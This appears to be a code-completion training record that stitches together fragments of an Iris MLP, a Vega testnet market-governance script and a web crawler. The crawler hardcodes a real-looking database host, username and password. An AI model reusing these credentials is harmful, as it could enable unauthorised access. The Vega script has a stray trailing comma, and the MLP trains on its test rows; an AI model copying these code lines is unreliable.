# [[1, 0], [1]],
# [[1, 1], [0]]
# ]
def data_trans():
train = []
x, y = load_data_set() # load dataset
# separate data into data and label
for idx,feature in enumerate(x):
train.append([feature,[y[idx]]])
print('done')
# separate data randomly into test and train
# xtrain, xtest, ytrain, ytest = load_data_set()
trainingset = random.sample(train,105)
testset = [f for f in train if f not in trainingset]
return trainingset , testset ,train
def test():
trainingset, testset, train = data_trans()
epoch = 80
nn = NeuralNetwork(len(train[0][0]), 10, len(train[0][1]))
for i in range(epoch):
for idx , trainfeatures in enumerate(trainingset):
randomtuple = random.choice(train)
training_inputs, training_outputs = randomtuple[0],randomtuple[1]
nn.train(training_inputs, training_outputs)
# print('epoch %d:, step:%d----error:%f'%(i, idx, nn.calculate_total_error([trainfeatures])))
# print(i, nn.calculate_total_error(train))
totaltesterror=0
for idx, testfeature in enumerate(testset):
singlerror = nn.calculate_total_error([testfeature])
# print('test error%f'%singlerror)
totaltesterror+=singlerror
print('epoch:%d, test error %f'%(i, totaltesterror/(idx+1)))
if __name__=="__main__":
test() | return total + self.bias
| random_line_split |
MLP.py | import random
import math
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
class NeuralNetwork:
# 3 layer network ----input----hidden----output
LEARNING_RATE = 0.5
# initialize NN
def __init__(self, num_inputs, num_hidden, num_outputs, hidden_layer_weights=None, hidden_layer_bias=None,
output_layer_weights=None, output_layer_bias=None):
self.num_inputs = num_inputs
self.hidden_layer = NeuronLayer(num_hidden, hidden_layer_bias)
self.output_layer = NeuronLayer(num_outputs, output_layer_bias)
self.init_weights_from_inputs_to_hidden_layer_neurons(hidden_layer_weights)
self.init_weights_from_hidden_layer_neurons_to_output_layer_neurons(output_layer_weights)
# self.inspect()
def init_weights_from_inputs_to_hidden_layer_neurons(self, hidden_layer_weights):
weight_num = 0
for h in range(len(self.hidden_layer.neurons)):
for i in range(self.num_inputs): # input layer
if not hidden_layer_weights:
# if no hidden_layer_weight---randomly pick a value
self.hidden_layer.neurons[h].weights.append(random.random())
else:
self.hidden_layer.neurons[h].weights.append(hidden_layer_weights[weight_num])
weight_num += 1
def init_weights_from_hidden_layer_neurons_to_output_layer_neurons(self, output_layer_weights):
weight_num = 0
for o in range(len(self.output_layer.neurons)):
for h in range(len(self.hidden_layer.neurons)): # hidden layer
if not output_layer_weights:
# if no output_layer_weight---randomly pick a value
self.output_layer.neurons[o].weights.append(random.random())
else:
self.output_layer.neurons[o].weights.append(output_layer_weights[weight_num])
weight_num += 1
def inspect(self): # print NN info
print('------')
print('* Inputs: {}'.format(self.num_inputs))
print('------')
print('Hidden Layer')
self.hidden_layer.inspect()
print('------')
print('* Output Layer')
self.output_layer.inspect()
print('------')
def feed_forward(self, inputs): # FP output
hidden_layer_outputs = self.hidden_layer.feed_forward(inputs) # hidden layer output-- to output layer
return self.output_layer.feed_forward(hidden_layer_outputs) # output layer output
def train(self, training_inputs, training_outputs):
self.feed_forward(training_inputs)
# BP
# 1. Output layer deltas Δ
pd_errors_wrt_output_neuron_total_net_input = [0]*len(self.output_layer.neurons)
for o in range(len(self.output_layer.neurons)): #to every neuron in output layer
# ∂E/∂zⱼ=∂E/∂a*∂a/∂z=cost'(target_output)*sigma'(z)
pd_errors_wrt_output_neuron_total_net_input[o] = self.output_layer.neurons[
o].calculate_pd_error_wrt_total_net_input(training_outputs[o])
# 2. Hidden layer Δ
pd_errors_wrt_hidden_neuron_total_net_input = [0]*len(self.hidden_layer.neurons)
for h in range(len(self.hidden_layer.neurons)):
# dE/dyⱼ = Σ ∂E/∂zⱼ * ∂z/∂yⱼ = Σ ∂E/∂zⱼ * wᵢⱼ
d_error_wrt_hidden_neuron_output = 0
| o in range(len(self.output_layer.neurons)):
for w_ho in range(len(self.output_layer.neurons[o].weights)):
# ∂Eⱼ/∂wᵢⱼ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢⱼ
pd_error_wrt_weight = pd_errors_wrt_output_neuron_total_net_input[o]*self.output_layer.neurons[
o].calculate_pd_total_net_input_wrt_weight(w_ho)
# Δw = α * ∂Eⱼ/∂wᵢ
self.output_layer.neurons[o].weights[w_ho] -= self.LEARNING_RATE*pd_error_wrt_weight
# 4. Update hidden neuron weights
for h in range(len(self.hidden_layer.neurons)):
for w_ih in range(len(self.hidden_layer.neurons[h].weights)):
# ∂Eⱼ/∂wᵢ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢ
pd_error_wrt_weight = pd_errors_wrt_hidden_neuron_total_net_input[h]*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_weight(w_ih)
# Δw = α * ∂Eⱼ/∂wᵢ
self.hidden_layer.neurons[h].weights[w_ih] -= self.LEARNING_RATE*pd_error_wrt_weight
def calculate_total_error(self, training_sets):
# calculate error
total_error = 0
for t in range(len(training_sets)):
training_inputs, training_outputs = training_sets[t]
result = self.feed_forward(training_inputs)
# print('result is %s' % result)
for o in range(len(training_outputs)):
total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
# total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
return total_error
class NeuronLayer:
# layer
def __init__(self, num_neurons, bias):
# neuron in a layer have the same bias
self.bias = bias if bias else random.random()
self.neurons = []
for i in range(num_neurons):
self.neurons.append(Neuron(self.bias))
# print layer info
self.inspect()
def inspect(self):
# print layer info
print('Neurons:', len(self.neurons))
for n in range(len(self.neurons)):
print(' Neuron', n)
for w in range(len(self.neurons[n].weights)):
print(' Weight:', self.neurons[n].weights[w])
print(' Bias:', self.bias)
def feed_forward(self, inputs):
# feed forward output, every neuron output (using the sigmoid)
outputs = []
for neuron in self.neurons:
outputs.append(neuron.calculate_output(inputs))
return outputs
def get_outputs(self):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.output)
return outputs
class Neuron:
# single neuron
def __init__(self, bias):
self.bias = bias
self.weights = []
def calculate_output(self, inputs): #single neuron output
self.inputs = inputs
self.output = self.squash(self.calculate_total_net_input())
return self.output
def calculate_total_net_input(self):
# z=W(n)x+b
total = 0
for i in range(len(self.inputs)):
total += self.inputs[i]*self.weights[i]
return total + self.bias
# Use the sigmoid function as the activition function, which is the definition of the sigmoid function.
def squash(self, total_net_input):
return 1/(1 + math.exp(-total_net_input))
# δ = ∂E/∂zⱼ = ∂E/∂yⱼ * dyⱼ/dzⱼ 关键key
def calculate_pd_error_wrt_total_net_input(self, target_output):
return self.calculate_pd_error_wrt_output(target_output)*self.calculate_pd_total_net_input_wrt_input()
# The error for each neuron is calculated by the Mean Square Error method:
def calculate_error(self, target_output):
return 0.5*(target_output - self.output) ** 2
# = ∂E/∂yⱼ = -(tⱼ - yⱼ)
def calculate_pd_error_wrt_output(self, target_output):
return -(target_output - self.output)
# dyⱼ/dzⱼ = yⱼ * (1 - yⱼ)这是sigmoid函数的导数表现形式.
def calculate_pd_total_net_input_wrt_input(self):
return self.output*(1 - self.output)
# = ∂zⱼ/∂wᵢ = some constant + 1 * xᵢw₁^(1-0) + some constant ... = xᵢ
def calculate_pd_total_net_input_wrt_weight(self, index):
return self.inputs[index]
def load_data_set():
"""
read in data 5D add all 1s column
"""
iris = pd.read_csv('/Users/michael/Codes/bitbucket/cs584-s18-kaiyue-ma/AS2/data/iris.csv', encoding="gbk")
iris = iris.sample(frac=1.0)
dummy = pd.get_dummies(iris['Species'])
iris = pd.concat([iris, dummy], axis=1)
org_x = np.array(iris.iloc[:, 1:5])
# org_y = np.array(iris['setosa']).reshape(len(iris), 1)
org_y = np.array(iris['setosa'])
# data_arr, test_arr, label_arr, test_label = train_test_split(org_x, org_y, test_size=0.2, random_state=42)
#
# data_arr = data_arr.tolist()
# test_arr = test_arr.tolist()
# label_arr = label_arr.tolist()
# test_label = test_label.tolist()
#
# data_arr = np.dot(data_arr)
# one = np.ones(len(data_arr))
# data_arr = np.column_stack(one , data_arr)
# data_arr = data_arr.tolist()
#
# test_arr = np.dot(test_arr)
# one = np.ones(len(test_arr))
# test_arr = np.column_stack(one, test_arr)
# test_arr = test_arr.tolist()
x = org_x.tolist()
y = org_y.tolist()
x = np.mat(x)
one = np.ones(len(x))
x = np.column_stack((one, x))
x = x.tolist()
# print(data_arr)
# x1_2 = data_arr[:, 1]
# print(x1_2)
# print('.....')
# print(label_arr)
# return data_arr, test_arr, label_arr, test_label
return x, y
# training_sets = [
# [[0, 0, 0], [0]],
# [[0, 0, 1], [0]],
# [[0, 1, 0], [0]],
# [[1, 0, 0], [0]],
# [[0, 1, 1], [1]],
# [[1, 0, 1], [1]],
# [[1, 1, 0], [1]],
# [[1, 1, 1], [1]],
# ]
# training_sets = [
# [[0, 0], [0]],
# [[0, 1], [1]],
# [[1, 0], [1]],
# [[1, 1], [0]]
# ]
def data_trans():
train = []
x, y = load_data_set() # load dataset
# separate data into data and label
for idx,feature in enumerate(x):
train.append([feature,[y[idx]]])
print('done')
# separate data randomly into test and train
# xtrain, xtest, ytrain, ytest = load_data_set()
trainingset = random.sample(train,105)
testset = [f for f in train if f not in trainingset]
return trainingset , testset ,train
def test():
trainingset, testset, train = data_trans()
epoch = 80
nn = NeuralNetwork(len(train[0][0]), 10, len(train[0][1]))
for i in range(epoch):
for idx , trainfeatures in enumerate(trainingset):
randomtuple = random.choice(train)
training_inputs, training_outputs = randomtuple[0],randomtuple[1]
nn.train(training_inputs, training_outputs)
# print('epoch %d:, step:%d----error:%f'%(i, idx, nn.calculate_total_error([trainfeatures])))
# print(i, nn.calculate_total_error(train))
totaltesterror=0
for idx, testfeature in enumerate(testset):
singlerror = nn.calculate_total_error([testfeature])
# print('test error%f'%singlerror)
totaltesterror+=singlerror
print('epoch:%d, test error %f'%(i, totaltesterror/(idx+1)))
if __name__=="__main__":
test() | for o in range(len(self.output_layer.neurons)):
d_error_wrt_hidden_neuron_output += pd_errors_wrt_output_neuron_total_net_input[o]* \
self.output_layer.neurons[o].weights[h]
# ∂E/∂zⱼ = dE/dyⱼ * ∂zⱼ/∂
pd_errors_wrt_hidden_neuron_total_net_input[h] = d_error_wrt_hidden_neuron_output*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_input()
# 3. Update output neuron weights
for | conditional_block |
propose-vote-enact-market.py | #!/usr/bin/python3
"""
Script language: Python3
Talks to:
- Vega node (REST)
- Vega wallet (REST)
Apps/Libraries:
- REST: requests (https://pypi.org/project/requests/)
"""
# Note: this file uses smart-tags in comments to section parts of the code to
# show them as snippets in our documentation. They are not necessary to be
# included when creating your own custom code.
#
# Example of smart-tags:
# __something:
# some code here
# :something__
import requests
import time
import os
import helpers
import uuid
node_url_rest = os.getenv("NODE_URL_REST")
if not helpers.check_url(node_url_rest):
print("Error: Invalid or missing NODE_URL_REST environment variable.")
exit(1)
wallet_server_url = os.getenv("WALLETSERVER_URL")
wallet_name = os.getenv("WALLET_NAME")
if not helpers.check_var(wallet_name):
print("Error: Invalid or missing WALLET_NAME environment variable.")
exit(1)
wallet_passphrase = os.getenv("WALLET_PASSPHRASE")
if not helpers.check_var(wallet_passphrase):
print("Error: Invalid or missing WALLET_PASSPHRASE environment variable.")
exit(1)
# Help guide users against including api version suffix on url
wallet_server_url = helpers.check_wallet_url(wallet_server_url)
###############################################################################
# W A L L E T S E R V I C E #
###############################################################################
print(f"Logging into wallet: {wallet_name}")
# __login_wallet:
# Log in to an existing wallet
req = {"wallet": wallet_name, "passphrase": wallet_passphrase}
response = requests.post(f"{wallet_server_url}/api/v1/auth/token", json=req)
helpers.check_response(response)
token = response.json()["token"]
# :login_wallet__
assert token != ""
print("Logged in to wallet successfully")
# __get_pubkey:
# List key pairs and select public key to use
headers = {"Authorization": f"Bearer {token}"}
response = requests.get(f"{wallet_server_url}/api/v1/keys", headers=headers)
helpers.check_response(response)
keys = response.json()["keys"]
pubkey = keys[0]["pub"]
# :get_pubkey__
assert pubkey != ""
print("Selected pubkey for signing")
###############################################################################
# F I N D A S S E T S #
###############################################################################
# __get_assets:
# Request a list of assets available on a Vega network
url = f"{node_url_rest}/assets"
response = requests.get(url)
helpers.check_response(response)
# :get_assets__
# Debugging
# print("Assets:\n{}".format(
# json.dumps(response.json(), indent=2, sort_keys=True)))
# __find_asset:
# Find settlement asset with name tDAI
found_asset_id = "UNKNOWN"
assets = response.json()["assets"]
for asset in assets:
if asset["details"]["symbol"] == "tDAI":
print("Found an asset with symbol tDAI")
print(asset)
found_asset_id = asset["id"]
break
# :find_asset__
if found_asset_id == "UNKNOWN":
print(
"tDAI asset not found on specified Vega network, please propose and "
"create this asset first"
)
exit(1)
###############################################################################
# G O V E R N A N C E T O K E N C H E C K #
###############################################################################
# Get the identifier of the governance asset on the Vega network
vote_asset_id = "UNKNOWN"
for asset in assets:
if asset["details"]["symbol"] == "tVOTE":
vote_asset_id = asset["id"]
break
if vote_asset_id == "UNKNOWN":
print(
"tVOTE asset not found on specified Vega network, please symbol name "
"check and try again"
)
exit(1)
# Request accounts for party and check governance asset balance
url = f"{node_url_rest}/parties/{pubkey}/accounts"
response = requests.get(url)
helpers.check_response(response)
# Debugging
# print("Accounts:\n{}".format(
# json.dumps(response.json(), indent=2, sort_keys=True)))
voting_balance = 0
accounts = response.json()["accounts"]
for account in accounts:
if account["asset"] == vote_asset_id:
print("Found governance asset account")
print(account)
voting_balance = account["balance"]
break
if voting_balance == 0:
print(f"Please deposit tVOTE asset to public key {pubkey} and try again")
exit(1)
###############################################################################
# B L O C K C H A I N T I M E #
###############################################################################
# __get_time:
# Request the current blockchain time, and convert to time in seconds
response = requests.get(f"{node_url_rest}/time")
helpers.check_response(response)
blockchain_time = int(response.json()["timestamp"])
blockchain_time_seconds = int(blockchain_time / 1e9) # Seconds precision
# :get_time__
assert blockchain_time > 0
assert blockchain_time_seconds > 0
print(
f"Blockchain time: {blockchain_time} ({blockchain_time_seconds} seconds "
"past epoch)"
)
###############################################################################
# P R O P O S E M A R K E T #
###############################################################################
# STEP 1 - Propose a BTC/DAI futures market
# Further documentation on creating markets: | # https://docs.testnet.vega.xyz/docs/api-howtos/create-market/
# __prepare_propose_market:
# Compose a governance proposal for a new market
proposal_ref = f"{pubkey}-{uuid.uuid4()}"
# Set closing/enactment and validation timestamps to valid time offsets
# from the current Vega blockchain time
closing_time = blockchain_time_seconds + 360
enactment_time = blockchain_time_seconds + 480
validation_time = blockchain_time_seconds + 1,
# The proposal command below contains the configuration for a new market
proposal = {
"proposalSubmission": {
"reference": proposal_ref,
"terms": {
"closingTimestamp": closing_time,
"enactmentTimestamp": enactment_time,
"validationTimestamp": validation_time,
"newMarket": {
"changes": {
"continuous": {
"tickSize": "0.01"
},
"decimalPlaces": 5,
"instrument": {
"code": "CRYPTO:BTCDAI/DEC22",
"future": {
"maturity": "2022-12-31T23:59:59Z",
"oracleSpec": {
"pubKeys": ["0x0000"],
"filters": [
{
"key": {
"name": "price.DAI.value",
"type": "TYPE_STRING",
},
"conditions": [
{
"operator": "OPERATOR_EQUALS",
"value": "5797800153",
},
],
},
],
},
"oracleSpecBinding": {
"settlementPriceProperty": "price.DAI.value"
},
"quoteName": "tDAI",
"settlementAsset": found_asset_id,
},
"name": "BTC/DAI (2022, tDAI)"
},
"metadata": [
"base:BTC",
"quote:DAI",
],
"liquidityMonitoringParameters": {
"targetStakeParameters": {
"timeWindow": 3600,
"scalingFactor": 10,
},
"triggeringRatio": 0,
"auctionExtension": 0,
},
"logNormal": {
"riskAversionParameter": 0.01,
"tau": 1.90128526884173e-06,
"params": {"mu": 0, "r": 0.016, "sigma": 0.05},
},
},
"liquidityCommitment": {
"commitmentAmount": 1,
"fee": "0.01",
"sells": [
{
"reference": "PEGGED_REFERENCE_BEST_ASK",
"proportion": 10,
"offset": 2000,
},
{
"reference": "PEGGED_REFERENCE_BEST_ASK",
"proportion": 10,
"offset": 1000,
},
],
"buys": [
{
"reference": "PEGGED_REFERENCE_BEST_BID",
"proportion": 10,
"offset": -1000,
},
{
"reference": "PEGGED_REFERENCE_BEST_BID",
"proportion": 10,
"offset": -2000,
},
],
"reference": "",
},
}
}
},
"pubKey": pubkey,
"propagate": True
}
# :prepare_propose_market__
print("Market proposal: ", proposal)
# __sign_tx_proposal:
# Sign the new market proposal transaction
# Note: Setting propagate to true will also submit to a Vega node
url = f"{wallet_server_url}/api/v1/command/sync"
response = requests.post(url, headers=headers, json=proposal)
helpers.check_response(response)
# :sign_tx_proposal__
print("Signed market proposal and sent to Vega")
# Debugging
# print("Signed transaction:\n", response.json(), "\n")
# Wait for proposal to be included in a block and to be accepted by Vega
# network
print("Waiting for blockchain...", end="", flush=True)
proposal_id = ""
done = False
while not done:
time.sleep(0.5)
print(".", end="", flush=True)
my_proposals = requests.get(
node_url_rest + "/parties/" + pubkey + "/proposals"
)
if my_proposals.status_code != 200:
continue
for n in my_proposals.json()["data"]:
if n["proposal"]["reference"] == proposal_ref:
proposal_id = n["proposal"]["id"]
print()
print("Your proposal has been accepted by the network")
print(n)
done = True
break
assert proposal_id != ""
###############################################################################
# V O T E O N M A R K E T #
###############################################################################
# STEP 2 - Let's vote on the market proposal
# IMPORTANT: When voting for a proposal on the Vega Testnet, typically a single
# YES vote from the proposer will not be enough to vote the market into
# existence. This is because of the network minimum threshold for voting on
# proposals, this threshold for market proposals this is currently a 66%
# majority vote either YES or NO.
# A proposer should enlist the help/YES votes from other community members,
# ideally on the Community forums (https://community.vega.xyz/c/testnet) or
# Discord (https://vega.xyz/discord)
# Further documentation on proposal voting and review here:
# https://docs.testnet.vega.xyz/docs/api-howtos/proposals/
# __prepare_vote:
# Create a vote message, to vote on the proposal
vote = {
"voteSubmission": {
"value": "VALUE_YES", # Can be either VALUE_YES or VALUE_NO
"proposalId": proposal_id,
},
"pubKey": pubkey,
"propagate": True
}
# :prepare_vote__
# Debugging
# print("Vote submission:\n", vote, "\n")
# __sign_tx_vote:
# Sign the vote transaction
# Note: Setting propagate to true will also submit to a Vega node
url = f"{wallet_server_url}/api/v1/command/sync"
response = requests.post(url, headers=headers, json=vote)
helpers.check_response(response)
# :sign_tx_vote__
print("Signed vote on proposal and sent to Vega")
# Debugging
# print("Signed transaction:\n", response.json(), "\n")
print("Waiting for vote on proposal to succeed or fail...", end="", flush=True)
done = False
while not done:
time.sleep(0.5)
my_proposals = requests.get(
node_url_rest + "/parties/" + pubkey + "/proposals"
)
if my_proposals.status_code != 200:
continue
for n in my_proposals.json()["data"]:
if n["proposal"]["reference"] == proposal_ref:
if n["proposal"]["state"] != "STATE_OPEN":
print(n["proposal"]["state"])
if n["proposal"]["state"] == "STATE_ENACTED":
done = True
break
elif n["proposal"]["state"] == "STATE_PASSED":
print("proposal vote has succeeded, waiting for enactment")
else:
print(n)
exit(1)
###############################################################################
# W A I T F O R M A R K E T #
###############################################################################
# STEP 3 - Wait for market to be enacted
# IMPORTANT: When voting for a proposal on the Vega Testnet, typically a single
# YES vote from the proposer will not be enough to vote the market into
# existence. As described above in STEP 2, a market will need community voting
# support to be passed and then enacted.
# __wait_for_market:
print("Waiting for proposal to be enacted or failed...", end="", flush=True)
done = False
while not done:
time.sleep(0.5)
print(".", end="", flush=True)
markets = requests.get(node_url_rest + "/markets")
if markets.status_code != 200:
continue
for n in markets.json()["markets"]:
if n["id"] == proposal_id:
print()
print(n)
done = True
break
# :wait_for_market__
# Completed. | random_line_split | |
propose-vote-enact-market.py | #!/usr/bin/python3
"""
Script language: Python3
Talks to:
- Vega node (REST)
- Vega wallet (REST)
Apps/Libraries:
- REST: requests (https://pypi.org/project/requests/)
"""
# Note: this file uses smart-tags in comments to section parts of the code to
# show them as snippets in our documentation. They are not necessary to be
# included when creating your own custom code.
#
# Example of smart-tags:
# __something:
# some code here
# :something__
import requests
import time
import os
import helpers
import uuid
node_url_rest = os.getenv("NODE_URL_REST")
if not helpers.check_url(node_url_rest):
print("Error: Invalid or missing NODE_URL_REST environment variable.")
exit(1)
wallet_server_url = os.getenv("WALLETSERVER_URL")
wallet_name = os.getenv("WALLET_NAME")
if not helpers.check_var(wallet_name):
print("Error: Invalid or missing WALLET_NAME environment variable.")
exit(1)
wallet_passphrase = os.getenv("WALLET_PASSPHRASE")
if not helpers.check_var(wallet_passphrase):
print("Error: Invalid or missing WALLET_PASSPHRASE environment variable.")
exit(1)
# Help guide users against including api version suffix on url
wallet_server_url = helpers.check_wallet_url(wallet_server_url)
###############################################################################
# W A L L E T S E R V I C E #
###############################################################################
print(f"Logging into wallet: {wallet_name}")
# __login_wallet:
# Log in to an existing wallet
req = {"wallet": wallet_name, "passphrase": wallet_passphrase}
response = requests.post(f"{wallet_server_url}/api/v1/auth/token", json=req)
helpers.check_response(response)
token = response.json()["token"]
# :login_wallet__
assert token != ""
print("Logged in to wallet successfully")
# __get_pubkey:
# List key pairs and select public key to use
headers = {"Authorization": f"Bearer {token}"}
response = requests.get(f"{wallet_server_url}/api/v1/keys", headers=headers)
helpers.check_response(response)
keys = response.json()["keys"]
pubkey = keys[0]["pub"]
# :get_pubkey__
assert pubkey != ""
print("Selected pubkey for signing")
###############################################################################
# F I N D A S S E T S #
###############################################################################
# __get_assets:
# Request a list of assets available on a Vega network
url = f"{node_url_rest}/assets"
response = requests.get(url)
helpers.check_response(response)
# :get_assets__
# Debugging
# print("Assets:\n{}".format(
# json.dumps(response.json(), indent=2, sort_keys=True)))
# __find_asset:
# Find settlement asset with name tDAI
found_asset_id = "UNKNOWN"
assets = response.json()["assets"]
for asset in assets:
if asset["details"]["symbol"] == "tDAI":
print("Found an asset with symbol tDAI")
print(asset)
found_asset_id = asset["id"]
break
# :find_asset__
if found_asset_id == "UNKNOWN":
print(
"tDAI asset not found on specified Vega network, please propose and "
"create this asset first"
)
exit(1)
###############################################################################
# G O V E R N A N C E T O K E N C H E C K #
###############################################################################
# Get the identifier of the governance asset on the Vega network
vote_asset_id = "UNKNOWN"
for asset in assets:
if asset["details"]["symbol"] == "tVOTE":
vote_asset_id = asset["id"]
break
if vote_asset_id == "UNKNOWN":
print(
"tVOTE asset not found on specified Vega network, please symbol name "
"check and try again"
)
exit(1)
# Request accounts for party and check governance asset balance
url = f"{node_url_rest}/parties/{pubkey}/accounts"
response = requests.get(url)
helpers.check_response(response)
# Debugging
# print("Accounts:\n{}".format(
# json.dumps(response.json(), indent=2, sort_keys=True)))
voting_balance = 0
accounts = response.json()["accounts"]
for account in accounts:
if account["asset"] == vote_asset_id:
print("Found governance asset account")
print(account)
voting_balance = account["balance"]
break
if voting_balance == 0:
print(f"Please deposit tVOTE asset to public key {pubkey} and try again")
exit(1)
###############################################################################
# B L O C K C H A I N T I M E #
###############################################################################
# __get_time:
# Request the current blockchain time, and convert to time in seconds
response = requests.get(f"{node_url_rest}/time")
helpers.check_response(response)
blockchain_time = int(response.json()["timestamp"])
blockchain_time_seconds = int(blockchain_time / 1e9) # Seconds precision
# :get_time__
assert blockchain_time > 0
assert blockchain_time_seconds > 0
print(
f"Blockchain time: {blockchain_time} ({blockchain_time_seconds} seconds "
"past epoch)"
)
###############################################################################
# P R O P O S E M A R K E T #
###############################################################################
# STEP 1 - Propose a BTC/DAI futures market
# Further documentation on creating markets:
# https://docs.testnet.vega.xyz/docs/api-howtos/create-market/
# __prepare_propose_market:
# Compose a governance proposal for a new market
proposal_ref = f"{pubkey}-{uuid.uuid4()}"
# Set closing/enactment and validation timestamps to valid time offsets
# from the current Vega blockchain time
closing_time = blockchain_time_seconds + 360
enactment_time = blockchain_time_seconds + 480
validation_time = blockchain_time_seconds + 1,
# The proposal command below contains the configuration for a new market
proposal = {
"proposalSubmission": {
"reference": proposal_ref,
"terms": {
"closingTimestamp": closing_time,
"enactmentTimestamp": enactment_time,
"validationTimestamp": validation_time,
"newMarket": {
"changes": {
"continuous": {
"tickSize": "0.01"
},
"decimalPlaces": 5,
"instrument": {
"code": "CRYPTO:BTCDAI/DEC22",
"future": {
"maturity": "2022-12-31T23:59:59Z",
"oracleSpec": {
"pubKeys": ["0x0000"],
"filters": [
{
"key": {
"name": "price.DAI.value",
"type": "TYPE_STRING",
},
"conditions": [
{
"operator": "OPERATOR_EQUALS",
"value": "5797800153",
},
],
},
],
},
"oracleSpecBinding": {
"settlementPriceProperty": "price.DAI.value"
},
"quoteName": "tDAI",
"settlementAsset": found_asset_id,
},
"name": "BTC/DAI (2022, tDAI)"
},
"metadata": [
"base:BTC",
"quote:DAI",
],
"liquidityMonitoringParameters": {
"targetStakeParameters": {
"timeWindow": 3600,
"scalingFactor": 10,
},
"triggeringRatio": 0,
"auctionExtension": 0,
},
"logNormal": {
"riskAversionParameter": 0.01,
"tau": 1.90128526884173e-06,
"params": {"mu": 0, "r": 0.016, "sigma": 0.05},
},
},
"liquidityCommitment": {
"commitmentAmount": 1,
"fee": "0.01",
"sells": [
{
"reference": "PEGGED_REFERENCE_BEST_ASK",
"proportion": 10,
"offset": 2000,
},
{
"reference": "PEGGED_REFERENCE_BEST_ASK",
"proportion": 10,
"offset": 1000,
},
],
"buys": [
{
"reference": "PEGGED_REFERENCE_BEST_BID",
"proportion": 10,
"offset": -1000,
},
{
"reference": "PEGGED_REFERENCE_BEST_BID",
"proportion": 10,
"offset": -2000,
},
],
"reference": "",
},
}
}
},
"pubKey": pubkey,
"propagate": True
}
# :prepare_propose_market__
print("Market proposal: ", proposal)
# __sign_tx_proposal:
# Sign the new market proposal transaction
# Note: Setting propagate to true will also submit to a Vega node
url = f"{wallet_server_url}/api/v1/command/sync"
response = requests.post(url, headers=headers, json=proposal)
helpers.check_response(response)
# :sign_tx_proposal__
print("Signed market proposal and sent to Vega")
# Debugging
# print("Signed transaction:\n", response.json(), "\n")
# Wait for proposal to be included in a block and to be accepted by Vega
# network
print("Waiting for blockchain...", end="", flush=True)
proposal_id = ""
done = False
while not done:
time.sleep(0.5)
print(".", end="", flush=True)
my_proposals = requests.get(
node_url_rest + "/parties/" + pubkey + "/proposals"
)
if my_proposals.status_code != 200:
continue
for n in my_proposals.json()["data"]:
|
assert proposal_id != ""
###############################################################################
# V O T E O N M A R K E T #
###############################################################################
# STEP 2 - Let's vote on the market proposal
# IMPORTANT: When voting for a proposal on the Vega Testnet, typically a single
# YES vote from the proposer will not be enough to vote the market into
# existence. This is because of the network minimum threshold for voting on
# proposals, this threshold for market proposals this is currently a 66%
# majority vote either YES or NO.
# A proposer should enlist the help/YES votes from other community members,
# ideally on the Community forums (https://community.vega.xyz/c/testnet) or
# Discord (https://vega.xyz/discord)
# Further documentation on proposal voting and review here:
# https://docs.testnet.vega.xyz/docs/api-howtos/proposals/
# __prepare_vote:
# Create a vote message, to vote on the proposal
vote = {
"voteSubmission": {
"value": "VALUE_YES", # Can be either VALUE_YES or VALUE_NO
"proposalId": proposal_id,
},
"pubKey": pubkey,
"propagate": True
}
# :prepare_vote__
# Debugging
# print("Vote submission:\n", vote, "\n")
# __sign_tx_vote:
# Sign the vote transaction
# Note: Setting propagate to true will also submit to a Vega node
url = f"{wallet_server_url}/api/v1/command/sync"
response = requests.post(url, headers=headers, json=vote)
helpers.check_response(response)
# :sign_tx_vote__
print("Signed vote on proposal and sent to Vega")
# Debugging
# print("Signed transaction:\n", response.json(), "\n")
print("Waiting for vote on proposal to succeed or fail...", end="", flush=True)
done = False
while not done:
time.sleep(0.5)
my_proposals = requests.get(
node_url_rest + "/parties/" + pubkey + "/proposals"
)
if my_proposals.status_code != 200:
continue
for n in my_proposals.json()["data"]:
if n["proposal"]["reference"] == proposal_ref:
if n["proposal"]["state"] != "STATE_OPEN":
print(n["proposal"]["state"])
if n["proposal"]["state"] == "STATE_ENACTED":
done = True
break
elif n["proposal"]["state"] == "STATE_PASSED":
print("proposal vote has succeeded, waiting for enactment")
else:
print(n)
exit(1)
###############################################################################
# W A I T F O R M A R K E T #
###############################################################################
# STEP 3 - Wait for market to be enacted
# IMPORTANT: When voting for a proposal on the Vega Testnet, typically a single
# YES vote from the proposer will not be enough to vote the market into
# existence. As described above in STEP 2, a market will need community voting
# support to be passed and then enacted.
# __wait_for_market:
print("Waiting for proposal to be enacted or failed...", end="", flush=True)
done = False
while not done:
time.sleep(0.5)
print(".", end="", flush=True)
markets = requests.get(node_url_rest + "/markets")
if markets.status_code != 200:
continue
for n in markets.json()["markets"]:
if n["id"] == proposal_id:
print()
print(n)
done = True
break
# :wait_for_market__
# Completed.
| if n["proposal"]["reference"] == proposal_ref:
proposal_id = n["proposal"]["id"]
print()
print("Your proposal has been accepted by the network")
print(n)
done = True
break | conditional_block |
integration.py | from argparse import ArgumentParser
from datetime import date
from goose import Goose
import collections
import mysql.connector
import hashlib
import arxiv
import requests
import time
import json
from goose import Goose
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
from rake_nltk import Rake
mydb = mysql.connector.connect(
host="128.111.54.55",
user="muxu",
passwd="8054552162",
database="moon_master_project",
charset='utf8mb4'
)
mycursor = mydb.cursor()
headers = requests.utils.default_headers()
headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
})
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument('--disable-extensions')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--no-sandbox')
prefs = {'profile.managed_default_content_settings.images':2}
chrome_options.add_experimental_option("prefs", prefs)
def main():
parser = ArgumentParser()
#default is crawl daily blogs
today = str(date.today()).split('-')
parser.add_argument('-sy', '--START_YEAR',
default=today[0], help='start year to crawl from')
parser.add_argument('-ey', '--END_YEAR',
default=str(int(today[0])), help='end year to crawl from')
parser.add_argument('-sm', '--START_MONTH',
default=today[1], help='start month to crawl from')
